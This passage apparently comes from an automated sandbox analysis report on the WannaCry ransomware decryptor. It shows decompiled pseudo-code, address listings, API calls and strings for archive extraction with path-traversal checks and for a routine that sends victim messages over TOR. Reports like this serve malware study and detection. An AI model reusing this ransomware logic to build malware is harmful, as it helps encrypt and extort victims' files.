														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t41 = _t157 + 4; // 0x4
													_t321 = _t41;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t42 = _t157 + 4; // 0x4
													_t321 = _t42;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("/../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t43 = _t157 + 4; // 0x4
													_t321 = _t43;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
													goto L23;
												}
												_push("/..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t44 = _t157 + 4; // 0x4
													_t321 = _t44;
													continue;
												}
												asm("repne scasb");
												_t338 = _t321 -  !0xffffffff;
												_t297 =  *(_t353 + 0x70);
												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
												_t354 = _t353 + 0xc;
												 *((char*)(_t354 + 0x13)) = 0;
												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
												_t355 = _t354 + 0xc;
												_t164 = _t162 >> 0x0000001e & 0x00000001;
												_t264 =  !(_t297 >> 0x17) & 0x00000001;
												_t340 =  *(_t355 + 0x3c) >> 8;
												__eflags = _t340;
												 *(_t355 + 0x12) = 0;
												_t234 = 1;
												if(_t340 == 0) {
													L39:
													_t264 = _t297 & 0x00000001;
													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
													_t164 = _t297 >> 0x00000004 & 0x00000001;
													_t299 = _t297 >> 0x00000005 & 0x00000001;
													__eflags = _t299;
													_t234 = _t299;
												} else {
													__eflags = _t340 - 7;
													if(_t340 == 7) {
														goto L39;
													} else {
														__eflags = _t340 - 0xb;
														if(_t340 == 0xb) {
															goto L39;
														} else {
															__eflags = _t340 - 0xe;
															if(_t340 == 0xe) {
																goto L39;
															}
														}
													}
												}
												_t341 = 0;
												__eflags = _t164;
												 *(_t346 + 0x108) = 0;
												if(_t164 != 0) {
													 *(_t346 + 0x108) = 0x10;
												}
												__eflags = _t234;
												if(_t234 != 0) {
													_t219 =  *(_t346 + 0x108) | 0x00000020;
													__eflags = _t219;
													 *(_t346 + 0x108) = _t219;
												}
												__eflags =  *(_t355 + 0x13);
												if( *(_t355 + 0x13) != 0) {
													_t217 =  *(_t346 + 0x108) | 0x00000002;
													__eflags = _t217;
													 *(_t346 + 0x108) = _t217;
												}
												__eflags = _t264;
												if(_t264 != 0) {
													_t215 =  *(_t346 + 0x108) | 0x00000001;
													__eflags = _t215;
													 *(_t346 + 0x108) = _t215;
												}
												__eflags =  *(_t355 + 0x12);
												if( *(_t355 + 0x12) != 0) {
													_t63 = _t346 + 0x108;
													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
													__eflags =  *_t63;
												}
												_t300 =  *((intOrPtr*)(_t355 + 0x58));
												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
												_t356 = _t355 + 8;
												 *(_t356 + 0x30) = _t177;
												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
												_t180 =  *(_t356 + 0x28);
												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
												 *(_t346 + 0x10c) = _t180;
												 *(_t346 + 0x114) = _t180;
												 *(_t346 + 0x11c) = _t180;
												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
													_t329 =  *(_t356 + 0x1c);
												} else {
													_t329 =  *(_t356 + 0x1c);
													 *((char*)(_t356 + 0x1a)) = 0;
													do {
														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
														_t273 = "UT";
														_t186 = _t356 + 0x18;
														while(1) {
															_t235 =  *_t186;
															_t303 = _t235;
															__eflags = _t235 -  *_t273;
															if(_t235 !=  *_t273) {
																break;
															}
															__eflags = _t303;
															if(_t303 == 0) {
																L57:
																_t186 = 0;
															} else {
																_t239 =  *((intOrPtr*)(_t186 + 1));
																_t311 = _t239;
																_t92 = _t273 + 1; // 0x2f000054
																__eflags = _t239 -  *_t92;
																if(_t239 !=  *_t92) {
																	break;
																} else {
																	_t186 = _t186 + 2;
																	_t273 = _t273 + 2;
																	__eflags = _t311;
																	if(_t311 != 0) {
																		continue;
																	} else {
																		goto L57;
																	}
																}
															}
															L59:
															__eflags = _t186;
															if(_t186 == 0) {
																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
																_t343 = _t341 + 5;
																_t276 = 1;
																__eflags = _t188 & 0x00000001;
																 *((char*)(_t356 + 0x12)) = 1;
																if((_t188 & 0x00000001) != 0) {
																	_t309 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t212 = E00411B50(_t309, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x11c) = _t212;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
																}
																__eflags = 1;
																if(1 != 0) {
																	_t307 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t204 = E00411B50(_t307, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x10c) = _t204;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
																}
																__eflags = _t276;
																if(_t276 != 0) {
																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
																}
															} else {
																goto L60;
															}
															goto L69;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L59;
														L60:
														_t341 = _t341 + 4;
														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
												}
												L69:
												__eflags = _t329;
												if(_t329 != 0) {
													_push(_t329);
													L00412C98();
													_t356 = _t356 + 4;
												}
												_t182 =  *((intOrPtr*)(_t356 + 0x20));
												memcpy(_t182 + 8, _t346, 0x4b << 2);
												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
												__eflags = 0;
												return 0;
												goto L73;
											}
										} else {
											_push(_t313);
											L00412C98();
											return 0x800;
										}
									} else {
										return 0x800;
									}
								} else {
									return 0x700;
								}
							} else {
								goto L8;
							}
						} else {
							if(_t312 == _t232) {
								L8:
								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
								 *((char*)(_t226 + 4)) = 0;
								 *((intOrPtr*)(_t226 + 0x108)) = 0;
								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
								 *((intOrPtr*)(_t226 + 0x110)) = 0;
								 *((intOrPtr*)(_t226 + 0x114)) = 0;
								 *((intOrPtr*)(_t226 + 0x118)) = 0;
								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
								 *((intOrPtr*)(_t226 + 0x120)) = 0;
								 *((intOrPtr*)(_t226 + 0x124)) = 0;
								 *((intOrPtr*)(_t226 + 0x128)) = 0;
								__eflags = 0;
								return 0;
							} else {
								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
							}
						}
					}
				}
				L73:
			}





























































                                                      0x00411cf9
                                                      0x00411d00
                                                      0x00411d03
                                                      0x00411d07
                                                      0x00411d0b
                                                      0x00412233
                                                      0x0041223f
                                                      0x00411d11
                                                      0x00411d11
                                                      0x00411d16
                                                      0x00000000
                                                      0x00411d1c
                                                      0x00411d1f
                                                      0x00411d22
                                                      0x00411d27
                                                      0x00411d27
                                                      0x00411d30
                                                      0x00411d35
                                                      0x00411d5a
                                                      0x00411d5c
                                                      0x00411db5
                                                      0x00411db7
                                                      0x00411dba
                                                      0x00411dbd
                                                      0x00411dc2
                                                      0x00411dc2
                                                      0x00411dc5
                                                      0x00411dc7
                                                      0x00411dca
                                                      0x00411dcd
                                                      0x00411dd2
                                                      0x00411dd4
                                                      0x00411dd7
                                                      0x00411dd7
                                                      0x00411df9
                                                      0x00411e10
                                                      0x00411e15
                                                      0x00411e18
                                                      0x00411e1a
                                                      0x00411e39
                                                      0x00411e3e
                                                      0x00411e41
                                                      0x00411e43
                                                      0x00411e56
                                                      0x00411e5a
                                                      0x00411e5b
                                                      0x00411e62
                                                      0x00411e68
                                                      0x00411e73
                                                      0x00411e7c
                                                      0x00411e7f
                                                      0x00411e81
                                                      0x00411eae
                                                      0x00411eb7
                                                      0x00411eb9
                                                      0x00411ebd
                                                      0x00411ec9
                                                      0x00411ecd
                                                      0x00411ed4
                                                      0x00411ed4
                                                      0x00411ed7
                                                      0x00411ed7
                                                      0x00411ed9
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee6
                                                      0x00411ee6
                                                      0x00411ee9
                                                      0x00411eeb
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411ef0
                                                      0x00411ef0
                                                      0x00411ef2
                                                      0x00411ef4
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411ef7
                                                      0x00411ef9
                                                      0x00411efb
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411efe
                                                      0x00411f03
                                                      0x00411f04
                                                      0x00411f09
                                                      0x00411f0c
                                                      0x00411f0e
                                                      0x00411f10
                                                      0x00411f10
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411f15
                                                      0x00411f1a
                                                      0x00411f1b
                                                      0x00411f20
                                                      0x00411f23
                                                      0x00411f25
                                                      0x00411f27
                                                      0x00411f27
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00411ee0
                                                      0x00411f2c
                                                      0x00411f31
                                                      0x00411f32
                                                      0x00411f37
                                                      0x00411f3a
                                                      0x00411f3c
                                                      0x00411f3e
                                                      0x00411f3e
                                                      0x00411ee0
                                                      0x00411ee0
                                                      0x00411ee2
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411ee4
                                                      0x00000000
                                                      0x00411ee0
                                                      0x00411f43
                                                      0x00411f48
                                                      0x00411f49
                                                      0x00411f4e
                                                      0x00411f51
                                                      0x00411f53
                                                      0x00411f55
                                                      0x00411f55
                                                      0x00000000
                                                      0x00411f55
                                                      0x00411f5f
                                                      0x00411f6a
                                                      0x00411f6e
                                                      0x00411f75
                                                      0x00411f75
                                                      0x00411f7e
                                                      0x00411f83
                                                      0x00411f83
                                                      0x00411f93
                                                      0x00411f95
                                                      0x00411f98
                                                      0x00411f98
                                                      0x00411f9b
                                                      0x00411fa0
                                                      0x00411fa2
                                                      0x00411fb3
                                                      0x00411fbb
                                                      0x00411fbe
                                                      0x00411fc9
                                                      0x00411fd5
                                                      0x00411fd7
                                                      0x00411fd7
                                                      0x00411fda
                                                      0x00411fa4
                                                      0x00411fa4
                                                      0x00411fa7
                                                      0x00000000
                                                      0x00411fa9
                                                      0x00411fa9
                                                      0x00411fac
                                                      0x00000000
                                                      0x00411fae
                                                      0x00411fae
                                                      0x00411fb1
                                                      0x00000000
                                                      0x00000000
                                                      0x00411fb1
                                                      0x00411fac
                                                      0x00411fa7
                                                      0x00411fdc
                                                      0x00411fde
                                                      0x00411fe0
                                                      0x00411fe6
                                                      0x00411fe8
                                                      0x00411fe8
                                                      0x00411ff2
                                                      0x00411ff4
                                                      0x00411ffc
                                                      0x00411ffc
                                                      0x00411ffe
                                                      0x00411ffe
                                                      0x00412008
                                                      0x0041200a
                                                      0x00412012
                                                      0x00412012
                                                      0x00412014
                                                      0x00412014
                                                      0x0041201a
                                                      0x0041201c
                                                      0x00412024
                                                      0x00412024
                                                      0x00412026
                                                      0x00412026
                                                      0x00412035
                                                      0x00412037
                                                      0x00412039
                                                      0x00412039
                                                      0x00412039
                                                      0x00412039
                                                      0x00412043
                                                      0x00412047
                                                      0x00412058
                                                      0x0041205e
                                                      0x00412063
                                                      0x00412066
                                                      0x00412074
                                                      0x00412078
                                                      0x0041207e
                                                      0x00412082
                                                      0x00412086
                                                      0x0041208c
                                                      0x00412092
                                                      0x0041209c
                                                      0x0041209e
                                                      0x004120a4
                                                      0x004120aa
                                                      0x004120b0
                                                      0x004121f2
                                                      0x004120b6
                                                      0x004120b6
                                                      0x004120ba
                                                      0x004120bf
                                                      0x004120c6
                                                      0x004120ca
                                                      0x004120ce
                                                      0x004120d3
                                                      0x004120d7
                                                      0x004120d7
                                                      0x004120d9
                                                      0x004120db
                                                      0x004120dd
                                                      0x00000000
                                                      0x00000000
                                                      0x004120df
                                                      0x004120e1
                                                      0x004120f7
                                                      0x004120f7
                                                      0x004120e3
                                                      0x004120e3
                                                      0x004120e6
                                                      0x004120e8
                                                      0x004120e8
                                                      0x004120eb
                                                      0x00000000
                                                      0x004120ed
                                                      0x004120ed
                                                      0x004120f0
                                                      0x004120f3
                                                      0x004120f5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004120f5
                                                      0x004120eb
                                                      0x00412100
                                                      0x00412100
                                                      0x00412102
                                                      0x00412120
                                                      0x00412124
                                                      0x00412133
                                                      0x00412136
                                                      0x00412138
                                                      0x0041213c
                                                      0x00412150
                                                      0x00412153
                                                      0x0041215e
                                                      0x00412161
                                                      0x00412166
                                                      0x0041216a
                                                      0x00412170
                                                      0x00412173
                                                      0x00412173
                                                      0x00412179
                                                      0x0041217b
                                                      0x0041218f
                                                      0x00412192
                                                      0x0041219d
                                                      0x004121a0
                                                      0x004121a5
                                                      0x004121a9
                                                      0x004121af
                                                      0x004121b2
                                                      0x004121b2
                                                      0x004121b8
                                                      0x004121ba
                                                      0x004121e1
                                                      0x004121e7
                                                      0x004121ea
                                                      0x004121ea
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00412102
                                                      0x004120fb
                                                      0x004120fd
                                                      0x00000000
                                                      0x00412104
                                                      0x0041210e
                                                      0x00412115
                                                      0x00412115
                                                      0x00412119
                                                      0x004121f6
                                                      0x004121f6
                                                      0x004121f8
                                                      0x004121fa
                                                      0x004121fb
                                                      0x00412200
                                                      0x00412200
                                                      0x00412203
                                                      0x00412214
                                                      0x0041221f
                                                      0x00412225
                                                      0x0041222e
                                                      0x00000000
                                                      0x0041222e
                                                      0x00411e83
                                                      0x00411e83
                                                      0x00411e84
                                                      0x00411e9a
                                                      0x00411e9a
                                                      0x00411e47
                                                      0x00411e53
                                                      0x00411e53
                                                      0x00411e1e
                                                      0x00411e2a
                                                      0x00411e2a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00411d37
                                                      0x00411d39
                                                      0x00411d5e
                                                      0x00411d66
                                                      0x00411d6d
                                                      0x00411d71
                                                      0x00411d74
                                                      0x00411d7a
                                                      0x00411d80
                                                      0x00411d86
                                                      0x00411d8c
                                                      0x00411d92
                                                      0x00411d98
                                                      0x00411d9e
                                                      0x00411da4
                                                      0x00411daa
                                                      0x00411db2
                                                      0x00411d3b
                                                      0x00411d57
                                                      0x00411d57
                                                      0x00411d39
                                                      0x00411d35
                                                      0x00411d16
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /../$/..\$\../$\..\
                                                      • API String ID: 0-3885502717
                                                      • Opcode ID: 2a7b4835dbee33ff67917d53809c18ea5066a20c5d79c717924bcce35cecf77d
                                                      • Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
                                                      • Opcode Fuzzy Hash: 2a7b4835dbee33ff67917d53809c18ea5066a20c5d79c717924bcce35cecf77d
                                                      • Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DB80 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • recv.WS2_32(?,?,?,00000000), ref: 0040DB91
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID:
                                                      • API String ID: 1507349165-0
                                                      • Opcode ID: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                                      • Instruction ID: 7776e5be7928a6c2c2562dd3bb1774681ff5e82bf649542f35cb965541f1d725
                                                      • Opcode Fuzzy Hash: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                                      • Instruction Fuzzy Hash: 0BC04CB9204300FFD204CB10CD85F6BB7A9EBD4711F10C90DB98D86254C670EC10DA65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004082C0 Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 181fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 56%
                                                      			E004082C0(void* __ecx) {
				void* __ebp;
				signed int _t44;
				void* _t45;
				void* _t47;
				signed int _t48;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t59;
				void* _t60;
				signed int _t65;
				signed int _t90;
				signed int _t91;
				signed int _t104;
				intOrPtr* _t106;
				struct _IO_FILE* _t107;
				signed int _t108;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				void* _t116;
				void* _t118;
				void* _t120;

				_push(0xffffffff);
				_push(E00413FCE);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t114;
				_t115 = _t114 - 0x8c;
				_t111 = __ecx;
				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
				if(_t44 > 0x3e8) {
					_push(0x3e8);
					_push(0);
					_push(_t115 + 0x14);
					L00412F6E();
					_push(_t44);
					 *((char*)(_t115 + 0xa8)) = 1;
					L00412D9A();
					 *((char*)(_t115 + 0xa4)) = 0;
					L00412CC2();
				}
				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
					_t106 = __imp__time;
					_t45 =  *_t106(0);
					_t90 =  *0x4218a8; // 0x0
					_t116 = _t115 + 4;
					__eflags = _t45 - _t90 - 0xb4;
					if(_t45 - _t90 >= 0xb4) {
						L13:
						_t47 =  *_t106(0);
						_t91 =  *0x4218a8; // 0x0
						_t116 = _t116 + 4;
						_t48 = _t47 - _t91;
						__eflags = _t48 - 0xe10;
						if(_t48 <= 0xe10) {
							L9:
							__eflags =  *0x4218ac - 3; // 0x0
							if(__eflags < 0) {
								L15:
								 *((intOrPtr*)(_t116 + 0x14)) = 0;
								memset(_t116 + 0x18, 0, 0x21 << 2);
								_t51 = fopen("00000000.res", "rb"); // executed
								_t107 = _t51;
								_t118 = _t116 + 0x14;
								__eflags = _t107;
								if(_t107 != 0) {
									fread(_t118 + 0x1c, 0x88, 1, _t107); // executed
									fclose(_t107);
									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
									_push(0);
									_push( *((intOrPtr*)(_t118 + 0xcc)));
									_push(_t118 + 0x38);
									_push(_t111 + 0x5f0);
									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
									_t118 = _t118 + 0x30;
									_t108 = _t56;
									E0040C670();
									_t58 =  *(_t118 + 0xb0);
									__eflags = _t108;
									if(_t108 < 0) {
										__eflags = _t58;
										if(_t58 != 0) {
											_push(0);
											_push(0x30);
											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
											L00412CC8();
										}
									} else {
										__eflags = _t58;
										if(_t58 != 0) {
											L00412CC8();
											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
											_t118 = _t118 + 4;
											 *0x4218a8 = _t58;
										}
									}
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t108;
								} else {
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t51 | 0xffffffff;
								}
								L23:
								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
								return _t59;
							}
							__eflags =  *(_t116 + 0xb0);
							if( *(_t116 + 0xb0) != 0) {
								L00412DA6();
								 *((char*)(_t116 + 0xa8)) = 2;
								_t60 =  *_t106(0);
								_t104 =  *0x4218a8; // 0x0
								_t120 = _t116 + 4;
								__eflags = 0x3d;
								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
								_push("You are sending too many mails! Please try again %d minutes later.");
								_push(_t120 + 0x10);
								L00412E00();
								_t48 =  *(_t120 + 0x1c);
								_t116 = _t120 + 0xc;
								_push(0);
								_push(0);
								_push(_t48);
								L00412CC8();
								 *((char*)(_t116 + 0xa4)) = 0;
								L00412CC2();
							}
							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
							L00412CC2();
							_t59 = _t48 | 0xffffffff;
							goto L23;
						}
						 *0x4218ac = 0;
						goto L15;
					}
					_t65 =  *0x4218ac; // 0x0
					__eflags = _t65 - 3;
					if(_t65 >= 3) {
						goto L13;
					}
					_t48 = _t65 + 1;
					__eflags = _t48;
					 *0x4218ac = _t48;
					goto L9;
				}
				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
					_push(0);
					_push(0);
					_push("Too short message!");
					L00412CC8();
				}
				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
				L00412CC2();
				_t59 = _t44 | 0xffffffff;
				goto L23;
			}


























                                                      0x004082c0
                                                      0x004082c2
                                                      0x004082cd
                                                      0x004082ce
                                                      0x004082d5
                                                      0x004082df
                                                      0x004082ea
                                                      0x004082f1
                                                      0x004082f9
                                                      0x004082fb
                                                      0x00408304
                                                      0x00408305
                                                      0x0040830d
                                                      0x00408312
                                                      0x0040831a
                                                      0x00408322
                                                      0x0040832b
                                                      0x00408332
                                                      0x00408332
                                                      0x00408342
                                                      0x00408378
                                                      0x0040837f
                                                      0x00408381
                                                      0x00408387
                                                      0x00408391
                                                      0x00408396
                                                      0x0040844d
                                                      0x0040844e
                                                      0x00408450
                                                      0x00408456
                                                      0x00408459
                                                      0x0040845b
                                                      0x00408460
                                                      0x004083af
                                                      0x004083af
                                                      0x004083b5
                                                      0x0040846c
                                                      0x00408477
                                                      0x00408485
                                                      0x00408487
                                                      0x0040848d
                                                      0x0040848f
                                                      0x00408492
                                                      0x00408494
                                                      0x004084c2
                                                      0x004084c9
                                                      0x004084e2
                                                      0x004084ee
                                                      0x004084f3
                                                      0x004084fa
                                                      0x004084fb
                                                      0x004084fc
                                                      0x00408501
                                                      0x00408504
                                                      0x00408506
                                                      0x0040850b
                                                      0x00408512
                                                      0x00408514
                                                      0x00408538
                                                      0x0040853a
                                                      0x0040853c
                                                      0x0040853d
                                                      0x0040853f
                                                      0x00408544
                                                      0x00408544
                                                      0x00408516
                                                      0x00408516
                                                      0x00408518
                                                      0x00408522
                                                      0x00408528
                                                      0x0040852e
                                                      0x00408531
                                                      0x00408531
                                                      0x00408518
                                                      0x00408550
                                                      0x0040855b
                                                      0x00408560
                                                      0x00408496
                                                      0x0040849d
                                                      0x004084a8
                                                      0x004084ad
                                                      0x004084ad
                                                      0x00408562
                                                      0x0040856d
                                                      0x0040857a
                                                      0x0040857a
                                                      0x004083bb
                                                      0x004083c2
                                                      0x004083c8
                                                      0x004083ce
                                                      0x004083d6
                                                      0x004083d8
                                                      0x004083f5
                                                      0x004083fd
                                                      0x00408403
                                                      0x00408404
                                                      0x00408409
                                                      0x0040840a
                                                      0x0040840f
                                                      0x00408413
                                                      0x00408416
                                                      0x00408417
                                                      0x00408418
                                                      0x00408419
                                                      0x00408422
                                                      0x00408429
                                                      0x00408429
                                                      0x00408435
                                                      0x00408440
                                                      0x00408445
                                                      0x00000000
                                                      0x00408445
                                                      0x00408466
                                                      0x00000000
                                                      0x00408466
                                                      0x0040839c
                                                      0x004083a1
                                                      0x004083a3
                                                      0x00000000
                                                      0x00000000
                                                      0x004083a9
                                                      0x004083a9
                                                      0x004083aa
                                                      0x00000000
                                                      0x004083aa
                                                      0x0040834b
                                                      0x0040834d
                                                      0x0040834e
                                                      0x0040834f
                                                      0x00408354
                                                      0x00408354
                                                      0x00408360
                                                      0x0040836b
                                                      0x00408370
                                                      0x00000000

                                                      APIs
                                                      • #4278.MFC42(000003E8,00000000,000003E8,?,?,77005C80), ref: 0040830D
                                                      • #858.MFC42 ref: 00408322
                                                      • #800.MFC42 ref: 00408332
                                                      • #1200.MFC42(Too short message!,00000000,00000000,?,?,77005C80), ref: 00408354
                                                      • #800.MFC42 ref: 0040836B
                                                      • time.MSVCRT ref: 0040837F
                                                      • #540.MFC42 ref: 004083C8
                                                      • time.MSVCRT ref: 004083D6
                                                      • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
                                                      • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
                                                      • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
                                                      • #800.MFC42 ref: 00408440
                                                      • time.MSVCRT ref: 0040844E
                                                      • fopen.MSVCRT ref: 00408487
                                                      • #800.MFC42 ref: 004084A8
                                                      • fread.MSVCRT ref: 004084C2
                                                      • fclose.MSVCRT ref: 004084C9
                                                      • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
                                                      • time.MSVCRT ref: 00408528
                                                      • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
                                                      • #800.MFC42 ref: 0040855B
                                                      Strings
                                                      • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
                                                      • s.wnry, xrefs: 004084DD
                                                      • Too short message!, xrefs: 0040834F
